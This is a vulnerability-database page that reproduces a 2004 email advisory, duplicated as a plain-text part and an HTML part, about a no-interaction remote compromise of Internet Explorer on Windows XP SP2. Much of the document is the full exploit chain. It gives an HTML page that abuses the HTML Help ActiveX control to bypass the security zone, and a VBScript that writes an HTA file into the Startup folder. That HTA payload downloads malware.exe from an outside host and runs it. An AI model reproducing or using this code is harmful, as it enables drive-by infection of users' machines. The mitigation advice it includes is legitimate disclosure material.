Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

MSXPSP2-ieEXP.txt

🗓️ 01 Jan 2005 00:00:00Reported by http-equivType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 53 Views

Microsoft XP SP2 has critical vulnerabilities exploited via malicious pages, needing no user action.

Code
`This is a multi-part message in MIME format.  
  
------=_NextPart_000_00B2_01C4E9A9.341A2510  
Content-Type: text/plain;  
charset="us-ascii"  
Content-Transfer-Encoding: 7bit  
  
Did they really do a good job on service pack 2? Was it worth the  
investment that's reported more then the missile defense system? All these  
articles on the great achievement by Microsoft and XP SP2 really merit?  
They totally forgot HTA files and HTM help files. Who knows that else.   
  
  
  
"Microsoft SP2 team, that is unacceptable, YOUR FIRED." Donald Trump  
  
  
  
  
  
  
  
  
  
http://freehost07.websamba.com/greyhats/sp2rc-analysis.htm  
  
  
  
  
  
Microsoft Internet Explorer XP SP2 Fully Automated Remote Compromise  
  
Dec, 21 2004  
  
  
Vulnerable  
----------  
- Microsoft Internet Explorer 6.0  
- Microsoft Windows XP Pro SP2  
- Microsoft Windows XP Home SP2  
  
  
Not Tested  
------------------------  
- Microsoft Windows 98  
- Microsoft Internet Explorer 5.x  
- Microsoft Windows 2003 Server  
  
  
  
Severity  
---------  
Critical - Remote code execution, no user intervention  
  
  
Intro  
------  
Although hundreds of millions of dollars have been spent on securing SP2,  
perfection is impossible. Through the joint effort of Michael Evanchik  
(http://www.michaelevanchik.com) and Paul from Greyhats Security  
(http://greyhats.cjb.net), a very critical vulnerability has been developed  
that can compromise a user's system without the need for user interaction  
besides visiting the malicious page. The vulnerability is not actually a  
vulnerability in itself, but rather it is uses multiple known holes in SP2  
including Help ActiveX Control Related Topics Zone Security Bypass  
Vulnerability and Help ActiveX Control Related Topics Cross Site Scripting  
Vulnerability.   
  
  
  
Why Microsoft has still not patched two of these known vulnerabilities that  
have been out for almost a half of year now, is beyond me.  
  
  
  
  
Tech Stuff and Explanation  
--------------------------  
  
1. Create a webpage with the following code:  
  
sp2rc.htm  
---------------------------------------------------------------------  
<OBJECT id="localpage" type="application/x-oleobject"  
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%  
style="position:absolute;top:140;left:72;z-index:100;"  
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">  
<PARAM name="Command" value="Related Topics, MENU">  
<PARAM name="Button" value="Text:Just a button">  
<PARAM name="Window" value="$global_blank">  
<PARAM name="Item1"  
value="command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm">  
</OBJECT>  
  
<OBJECT id="inject" type="application/x-oleobject"  
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%  
style="position:absolute;top:140;left:72;z-index:100;"  
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">  
<PARAM name="Command" value="Related Topics, MENU">  
<PARAM name="Button" value="Text:Just a button">  
<PARAM name="Window" value="$global_blank">  
<PARAM name="Item1"  
value='command;javascript:execScript("document.write(\"<script  
language=\\\"vbscript\\\"  
src=\\\"http://freehost07.websamba.com/greyhats/writehta.txt\\\"\"+String.fr  
omCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>  
</OBJECT>  
  
<script>  
localpage.HHClick();  
setTimeout("inject.HHClick()",100);  
</script>  
---------------------------------------------------------------------  
  
Explanation of above code:  
The first object (id: localpage) tells hhctrl.ocx to open a help popup  
window to the location C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm.  
This file was chosen because it is treated as the local zone and it doesn't  
have any script to mess us up. On some computers an error is shown before  
the popup. This is the user's only chance to prevent the vulnerability from  
working. If internet explorer were to be closed at this point, the user  
would be safe.  
  
The second object (id: inject) tells the help popup to navigate to a  
javascript protocol, which executes. Thus, cross site scripting has just  
taken place. A script tag that uses a remote file is written to the page,  
and writehta.txt (below) is executed in the unsecured local zone.  
  
In the script, HHClick is able to be used to automate the vulnerability.  
This is more effective than the previously described method of requiring a  
user to click on a button.  
  
  
2. Writehta.txt uses adodb recordset to write Microsoft Office.hta to the  
user's startup folder. See Michael Evanchik's analysis of the drag and drop  
vulnerability for an explanation on adodb recordset.  
  
Also it is reported that a ADODB recordset can be build locally without  
using a http server or ftp server like below.  
  
writehta.txt  
---------------------------------------------------------------------  
Dim Conn, rs  
Set Conn = CreateObject("ADODB.Connection")  
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _  
"Dbq=http://www.malware.com;" & _  
"Extensions=asc,csv,tab,txt;" & _  
"Persist Security Info=False"  
Dim sql  
sql = "SELECT * from foobar.txt"  
set rs = conn.execute(sql)  
set rs =CreateObject("ADODB.recordset")  
rs.Open "SELECT * from foobar.txt", conn  
rs.Save "C:\Documents and Settings\All Users\Start  
Menu\Programs\Startup\Microsoft Office.hta", adPersistXML  
rs.close  
conn.close  
window.close  
---------------------------------------------------------------------  
  
  
3. f00bar.txt (thanks malware for hosting this file) is the file requested  
by the adodb recordset (again, read the drag and drop analysis at  
www.michaelevanchik.com for an explanation on how this works and why the the  
f00bar.txt looks like it does). Because there is absolutely no limit on what  
you can do in an hta file, an old, yet effective method of requesting and  
saving a file to the user's hd is used. From that, a wscript shell is  
created and used to run the program. And now, ladies and gentlemen, we have  
compromised the user's machine.  
  
f00bar.txt  
---------------------------------------------------------------------  
"meaning less shit i had to put here"  
"<script language=vbscript> crap = """  
""": on error resume next: crap = """  
""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""  
""" : o.open  
""GET"",""http://freehost07.websamba.com/greyhats/malware.exe"",False :  
crap="""  
""" : o.send : crap="""  
""" : set s = createobject(""adodb.stream"") : crap="""  
""" : s.type=1 : crap="""  
""" : s.open : crap="""  
""" : s.write o.responseBody : crap="""  
""" : s.savetofile ""C:\malware.exe"",2 : crap="""  
""" : Set ws = CreateObject(""WScript.Shell"") : crap="""  
""" : ws.Run ""C:\malware.exe"", 3, FALSE : crap="""  
"""</script> crap="""  
---------------------------------------------------------------------  
  
  
4. Upload hhtctrl.ocx for the computers that don't happen to have this  
control. All XP's seem to have this by default, some win2k3's do not  
(according to Michael Evanchik)  
  
  
Proof of Concept?  
------------------  
- http://freehost07.websamba.com/greyhats/sp2rc.htm  
  
- If an error is shown, press OK. This is normal.  
  
- Notice in your startup menu a new file called Microsoft Office.hta. When  
run, this file will download and launch a harmless executable (which  
includes a pretty neat fire animation)   
  
  
  
Vendor Recommendations  
----------------------  
- Like Michael Evanchik said in his previous analysis, Microsoft needs to  
apply XP Service Pack 2's local zone lockdown to .HTA files and HTML Help  
(chm) files as well.  
  
- This might be a little farfetched, but it would solve a lot of problems:  
Take out the startup folder and only support running files during startup  
through the registry. The startup folder is a major part of this  
vulnerability and I can almost guarantee it will be used for another remote  
compromise.  
  
- Microsoft could possibly take HTA files out altogether. I have not seen  
them used for anything beyond hacking.  
  
- No vulnerability is too small or too insignificant to be taken seriously.  
Treat every vulnerability as if it could be dangerous.   
  
  
  
User Recommendations  
---------------------  
- Disable hta files.  
- Get yourself antivirus software. I recommend Symantec because once they  
get their lazy asses off the couch and fix some of this stuff you will be a  
lot better off.  
- Disable active scripting in Internet Explorer. If nothing else, do this.  
- Do not use Internet Explorer, use Mozilla Firebird (now known as FireFox  
www.mozilla.org)  
  
  
  
Credit  
------  
Paul from Greyhats  
Michael Evanchik  
Http equiv (thanks for allowing me to use your server for f00bar.txt)  
  
  
Greets  
------  
- Liu Die Yu (all the work you've done is amazing)  
  
  
Contact  
-------  
[email protected]  
http://greyhats.cjb.net  
  
Note  
-----  
Greyhats is becoming bigger and is in need of an upgrade. If anyone is  
interested in donating some webspace and a domain name I would be very  
appreciative. Contact me so that we may work something out :)  
  
  
  
  
  
Michael Evanchik  
  
Relationship1  
  
p: 914-921-4400  
  
f: 914-921-6007  
  
mailto:[email protected]  
  
web: http://www.relationship1.com  
  
  
  
  
  
  
------=_NextPart_000_00B2_01C4E9A9.341A2510  
Content-Type: text/html;  
charset="us-ascii"  
Content-Transfer-Encoding: quoted-printable  
  
<html xmlns:o=3D"urn:schemas-microsoft-com:office:office" =  
xmlns:w=3D"urn:schemas-microsoft-com:office:word" =  
xmlns:st1=3D"urn:schemas-microsoft-com:office:smarttags" =  
xmlns=3D"http://www.w3.org/TR/REC-html40">  
  
<head>  
<meta http-equiv=3DContent-Type content=3D"text/html; =  
charset=3Dus-ascii">  
<meta name=3DGenerator content=3D"Microsoft Word 11 (filtered medium)">  
<o:SmartTagType =  
namespaceuri=3D"urn:schemas-microsoft-com:office:smarttags"  
name=3D"State"/>  
<o:SmartTagType =  
namespaceuri=3D"urn:schemas-microsoft-com:office:smarttags"  
name=3D"City"/>  
<o:SmartTagType =  
namespaceuri=3D"urn:schemas-microsoft-com:office:smarttags"  
name=3D"place"/>  
<!--[if !mso]>  
<style>  
st1\:*{behavior:url(#default#ieooui) }  
</style>  
<![endif]-->  
<style>  
<!--  
/* Style Definitions */  
p.MsoNormal, li.MsoNormal, div.MsoNormal  
{margin:0in;  
margin-bottom:.0001pt;  
font-size:12.0pt;  
font-family:"Times New Roman";}  
a:link, span.MsoHyperlink  
{color:blue;  
text-decoration:underline;}  
a:visited, span.MsoHyperlinkFollowed  
{color:purple;  
text-decoration:underline;}  
p  
{mso-margin-top-alt:auto;  
margin-right:0in;  
mso-margin-bottom-alt:auto;  
margin-left:0in;  
font-size:12.0pt;  
font-family:"Times New Roman";}  
span.EmailStyle17  
{mso-style-type:personal-compose;  
font-family:Arial;  
color:windowtext;}  
@page Section1  
{size:8.5in 11.0in;  
margin:1.0in 1.25in 1.0in 1.25in;}  
div.Section1  
{page:Section1;}  
-->  
</style>  
  
</head>  
  
<body lang=3DEN-US link=3Dblue vlink=3Dpurple>  
  
<div class=3DSection1>  
  
<p class=3DMsoNormal><font size=3D2 face=3DArial><span =  
style=3D'font-size:10.0pt;  
font-family:Arial'>Did they really do a good job on service pack =  
2?&nbsp; Was  
it worth the investment that’s reported more then the missile =  
defense  
system?&nbsp; All these articles on the great achievement by Microsoft =  
&nbsp;and  
XP SP2 really merit?&nbsp; They totally forgot HTA files and HTM help  
files.&nbsp; Who knows that else.&nbsp; <o:p></o:p></span></font></p>  
  
<p class=3DMsoNormal><font size=3D2 face=3DArial><span =  
style=3D'font-size:10.0pt;  
font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>  
  
<p class=3DMsoNormal><font size=3D2 face=3DArial><span =  
style=3D'font-size:10.0pt;  
font-family:Arial'>“Microsoft SP2 team, that is unacceptable, =  
&nbsp;YOUR  
FIRED.”&nbsp; Donald Trump<o:p></o:p></span></font></p>  
  
<p class=3DMsoNormal><font size=3D2 face=3DArial><span =  
style=3D'font-size:10.0pt;  
font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>  
  
<p class=3DMsoNormal><font size=3D2 face=3DArial><span =  
style=3D'font-size:10.0pt;  
font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>  
  
<p class=3DMsoNormal><font size=3D2 face=3DArial><span =  
style=3D'font-size:10.0pt;  
font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>  
  
<p class=3DMsoNormal><font size=3D2 face=3DArial><span =  
style=3D'font-size:10.0pt;  
font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>  
  
<p class=3DMsoNormal><font size=3D2 face=3DArial><span =  
style=3D'font-size:10.0pt;  
font-family:Arial'><a  
href=3D"http://freehost07.websamba.com/greyhats/sp2rc-analysis.htm">http:=  
//freehost07.websamba.com/greyhats/sp2rc-analysis.htm</a><o:p></o:p></spa=  
n></font></p>  
  
<p class=3DMsoNormal><font size=3D2 face=3DArial><span =  
style=3D'font-size:10.0pt;  
font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>  
  
<p class=3DMsoNormal><font size=3D2 face=3DArial><span =  
style=3D'font-size:10.0pt;  
font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'>Microsoft  
Internet Explorer XP SP2 Fully Automated Remote =  
Compromise<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'>Dec, 21  
2004<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'><br>  
Vulnerable<br>  
----------<br>  
- Microsoft Internet Explorer 6.0<br>  
- Microsoft Windows XP Pro SP2<br>  
- Microsoft Windows XP Home SP2<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'><br>  
Not Tested<br>  
------------------------<br>  
- Microsoft Windows 98<br>  
- Microsoft Internet Explorer 5.x<br>  
- Microsoft Windows 2003 Server<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'>&nbsp;<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'>Severity<br>  
---------<br>  
Critical - Remote code execution, no user =  
intervention<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'><br>  
Intro<br>  
------<br>  
Although hundreds of millions of dollars have been spent on securing =  
SP2,  
perfection is impossible. Through the joint effort of Michael Evanchik =  
(<a  
href=3D"http://www.michaelevanchik.com">http://www.michaelevanchik.com</a=  
>) and  
Paul from Greyhats Security (<a =  
href=3D"http://greyhats.cjb.net">http://greyhats.cjb.net</a>),  
a very critical vulnerability has been developed that can compromise a =  
user's  
system without the need for user interaction besides visiting the =  
malicious  
page. The vulnerability is not actually a vulnerability in itself, but =  
rather  
it is uses multiple known holes in SP2 including Help ActiveX Control =  
Related  
Topics Zone Security Bypass Vulnerability and Help ActiveX Control =  
Related  
Topics Cross Site Scripting Vulnerability. <o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'>Why  
Microsoft has still not patched two of these known vulnerabilities that =  
have  
been out for almost a half of year now, is beyond =  
me.<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'><br>  
Tech Stuff and Explanation<br>  
--------------------------<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'>1. Create  
a webpage with the following code:<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'>sp2rc.htm<br>  
---------------------------------------------------------------------<br>=  
  
<OBJECT id=3D"localpage" =  
type=3D"application/x-oleobject"  
classid=3D"clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" =  
height=3D7%<br>  
style=3D"position:absolute;top:140;left:72;z-index:100;"  
codebase=3D"hhctrl.ocx#Version=3D5,2,3790,1194" =  
width=3D"7%"><br>  
<PARAM name=3D"Command" value=3D"Related Topics, =  
MENU"><br>  
<PARAM name=3D"Button" value=3D"Text:Just a =  
button"><br>  
<PARAM name=3D"Window" =  
value=3D"$global_blank"><br>  
<PARAM name=3D"Item1" =  
value=3D"command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\to=  
ols.htm"><br>  
</OBJECT><o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'><OBJECT  
id=3D"inject" type=3D"application/x-oleobject"  
classid=3D"clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" =  
height=3D7%<br>  
style=3D"position:absolute;top:140;left:72;z-index:100;" =  
codebase=3D"hhctrl.ocx#Version=3D5,2,3790,1194"  
width=3D"7%"><br>  
<PARAM name=3D"Command" value=3D"Related Topics, =  
MENU"><br>  
<PARAM name=3D"Button" value=3D"Text:Just a =  
button"><br>  
<PARAM name=3D"Window" =  
value=3D"$global_blank"><br>  
<PARAM name=3D"Item1"  
value=3D'command;javascript:execScript("document.write(\"<sc=  
ript  
language=3D\\\"vbscript\\\"  
src=3D\\\"http://freehost07.websamba.com/greyhats/writehta.txt\\\&qu=  
ot;\"+String.fromCharCode(62)+\"</scr\"+\"ipt\&quo=  
t;+String.fromCharCode(62))")'><br>  
</OBJECT><o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'><script><br>  
localpage.HHClick();<br>  
setTimeout("inject.HHClick()",100);<br>  
</script><br>  
---------------------------------------------------------------------<o:p=  
></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'>Explanation  
of above code:<br>  
The first object (id: localpage) tells hhctrl.ocx to open a help popup =  
window  
to the location C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm. =  
This file  
was chosen because it is treated as the local zone and it doesn't have =  
any  
script to mess us up. On some computers an error is shown before the =  
popup.  
This is the user's only chance to prevent the vulnerability from =  
working. If  
internet explorer were to be closed at this point, the user would be =  
safe.<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'>The  
second object (id: inject) tells the help popup to navigate to a =  
javascript  
protocol, which executes. Thus, cross site scripting has just taken =  
place. A  
script tag that uses a remote file is written to the page, and =  
writehta.txt  
(below) is executed in the unsecured local =  
zone.<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'>In the  
script, HHClick is able to be used to automate the vulnerability. This =  
is more  
effective than the previously described method of requiring a user to =  
click on  
a button.<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'><br>  
2. Writehta.txt uses adodb recordset to write Microsoft Office.hta to =  
the  
user's startup folder. See Michael Evanchik's analysis of the drag and =  
drop  
vulnerability for an explanation on adodb =  
recordset.<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'>Also it  
is reported that a ADODB recordset can be build locally without using a =  
http  
server or ftp server like below.<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'>writehta.txt<br>  
---------------------------------------------------------------------<br>=  
  
<nobr>Dim <st1:place w:st=3D"on"><st1:State =  
w:st=3D"on">Conn</st1:State></st1:place>,  
rs<br>  
<st1:place w:st=3D"on"><st1:City w:st=3D"on">Set</st1:City> <st1:State =  
w:st=3D"on">Conn</st1:State></st1:place>  
=3D CreateObject("ADODB.Connection")<br>  
Conn.Open "Driver=3D{Microsoft Text Driver (*.txt; *.csv)};" =  
& _<br>  
"Dbq=3Dhttp://www.malware.com;" & _<br>  
"Extensions=3Dasc,csv,tab,txt;" & _<br>  
"Persist Security Info=3DFalse"<br>  
Dim sql<br>  
sql =3D "SELECT * from foobar.txt"<br>  
set rs =3D conn.execute(sql)<br>  
set rs =3DCreateObject("ADODB.recordset")<br>  
rs.Open "SELECT * from foobar.txt", conn<br>  
rs.Save "C:\Documents and Settings\All Users\Start  
Menu\Programs\Startup\Microsoft Office.hta", adPersistXML<br>  
rs.close<br>  
conn.close<br>  
window.close</nobr><br>  
---------------------------------------------------------------------<o:p=  
></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'><br>  
3. f00bar.txt (thanks malware for hosting this file) is the file =  
requested by  
the adodb recordset (again, read the drag and drop analysis at <a  
href=3D"http://www.michaelevanchik.com">www.michaelevanchik.com</a> for =  
an  
explanation on how this works and why the the f00bar.txt looks like it =  
does).  
Because there is absolutely no limit on what you can do in an hta file, =  
an old,  
yet effective method of requesting and saving a file to the user's hd is =  
used.  
>>From that, a wscript shell is created and used to run the program. And =  
now,  
ladies and gentlemen, we have compromised the user's =  
machine.<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'>f00bar.txt<br>  
---------------------------------------------------------------------<br>=  
  
"meaning less shit i had to put here"<br>  
"<script language=3Dvbscript> crap =3D """<br>  
""": on error resume next: crap =3D =  
"""<br>  
""" : set o =3D  
CreateObject(""msxml2.XMLHTTP"") : =  
crap=3D"""<br>  
""" : o.open  
""GET"",""http://freehost07.websamba.com/gr=  
eyhats/malware.exe"",False  
: crap=3D"""<br>  
""" : o.send : crap=3D"""<br>  
""" : set s =3D =  
createobject(""adodb.stream"")  
: crap=3D"""<br>  
""" : s.type=3D1 : crap=3D"""<br>  
""" : s.open : crap=3D"""<br>  
""" : s.write o.responseBody : =  
crap=3D"""<br>  
""" : s.savetofile =  
""C:\malware.exe"",2 :  
crap=3D"""<br>  
""" : Set ws =3D  
CreateObject(""WScript.Shell"") : =  
crap=3D"""<br>  
""" : ws.Run ""C:\malware.exe"", 3, =  
FALSE :  
crap=3D"""<br>  
"""</script> crap=3D"""<br>  
---------------------------------------------------------------------<o:p=  
></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'><br>  
4.&nbsp; Upload hhtctrl.ocx for the computers that don’t happen to =  
have  
this control.&nbsp; All XP's seem to have this by default, some win2k3's =  
do not  
(according to Michael Evanchik)<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'><br>  
Proof of Concept?<br>  
------------------<br>  
- <a =  
href=3D"http://freehost07.websamba.com/greyhats/sp2rc.htm">http://freehos=  
t07.websamba.com/greyhats/sp2rc.htm</a><o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'>- If an  
error is shown, press OK. This is normal.<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'>- Notice  
in your startup menu a new file called Microsoft Office.hta. When run, =  
this  
file will download and launch a harmless executable (which includes a =  
pretty  
neat fire animation) <o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'>&nbsp;<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'>Vendor  
Recommendations<br>  
----------------------<br>  
- Like Michael Evanchik said in his previous analysis, Microsoft needs =  
to apply  
XP Service Pack 2's local zone lockdown to .HTA files and HTML Help =  
(chm) files  
as well.<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'>- This  
might be a little farfetched, but it would solve a lot of problems: Take =  
out  
the startup folder and only support running files during startup through =  
the  
registry. The startup folder is a major part of this vulnerability and I =  
can  
almost guarantee it will be used for another remote =  
compromise.<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'>-  
Microsoft could possibly take HTA files out altogether. I have not seen =  
them  
used for anything beyond hacking.<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'>- No  
vulnerability is too small or too insignificant to be taken seriously. =  
Treat  
every vulnerability as if it could be dangerous. =  
<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'>&nbsp;<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'>User Recommendations<br>  
---------------------<br>  
- Disable hta files.<br>  
- Get yourself antivirus software. I recommend Symantec because once =  
they get  
their lazy asses off the couch and fix some of this stuff you will be a =  
lot  
better off.<br>  
- Disable active scripting in Internet Explorer. If nothing else, do =  
this.<br>  
- Do not use Internet Explorer, use Mozilla Firebird (now known as  
FireFox&nbsp; <a =  
href=3D"http://www.mozilla.org">www.mozilla.org</a>)<o:p></o:p></span></f=  
ont></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'>&nbsp;<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'>Credit<br>  
------<br>  
Paul from Greyhats<br>  
Michael Evanchik<br>  
Http equiv (thanks for allowing me to use your server for =  
f00bar.txt)<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'><br>  
Greets<br>  
------<br>  
- Liu Die Yu (all the work you've done is =  
amazing)<o:p></o:p></span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'><br>  
Contact<br>  
-------<br>  
<a href=3D"mailto:[email protected]">[email protected]</a><br>  
<a =  
href=3D"http://greyhats.cjb.net">http://greyhats.cjb.net</a><o:p></o:p></=  
span></font></p>  
  
<p><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:12.0pt'>Note<br>  
-----<br>  
Greyhats is becoming bigger and is in need of an upgrade. If anyone is  
interested in donating some webspace and a domain name I would be very  
appreciative. Contact me so that we may work something out =  
:)<o:p></o:p></span></font></p>  
  
<p class=3DMsoNormal><font size=3D2 face=3DArial><span =  
style=3D'font-size:10.0pt;  
font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>  
  
<p class=3DMsoNormal><font size=3D2 face=3DArial><span =  
style=3D'font-size:10.0pt;  
font-family:Arial'><o:p>&nbsp;</o:p></span></font></p>  
  
<p class=3DMsoNormal><font size=3D2 face=3DArial><span =  
style=3D'font-size:10.0pt;  
font-family:Arial'>Michael Evanchik</span></font><o:p></o:p></p>  
  
<p class=3DMsoNormal><font size=3D2 face=3DArial><span =  
style=3D'font-size:10.0pt;  
font-family:Arial'>Relationship1</span></font><o:p></o:p></p>  
  
<p class=3DMsoNormal><font size=3D2 face=3DArial><span =  
style=3D'font-size:10.0pt;  
font-family:Arial'>p: 914-921-4400</span></font><o:p></o:p></p>  
  
<p class=3DMsoNormal><font size=3D2 face=3DArial><span =  
style=3D'font-size:10.0pt;  
font-family:Arial'>f:&nbsp; 914-921-6007</span></font><o:p></o:p></p>  
  
<p class=3DMsoNormal><font size=3D2 face=3DArial><span =  
style=3D'font-size:10.0pt;  
font-family:Arial'><a =  
href=3D"mailto:[email protected]">mailto:mevanchik@relationship=  
1.com</a></span></font><o:p></o:p></p>  
  
<p class=3DMsoNormal><font size=3D2 face=3DArial><span =  
style=3D'font-size:10.0pt;  
font-family:Arial'>web: <a =  
href=3D"http://www.relationship1.com">http://www.relationship1.com</a></s=  
pan></font><o:p></o:p></p>  
  
<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:  
12.0pt'>&nbsp;</span><o:p></o:p></font></p>  
  
<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =  
style=3D'font-size:  
12.0pt'><o:p>&nbsp;</o:p></span></font></p>  
  
</div>  
  
</body>  
  
</html>  
  
------=_NextPart_000_00B2_01C4E9A9.341A2510--  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jan 2005 00:00Current
7.4High risk
Vulners AI Score7.4
microsoftsp2vulnerabilitiesremote executioninternet explorersystem compromiseno user interactionpatching issues.
53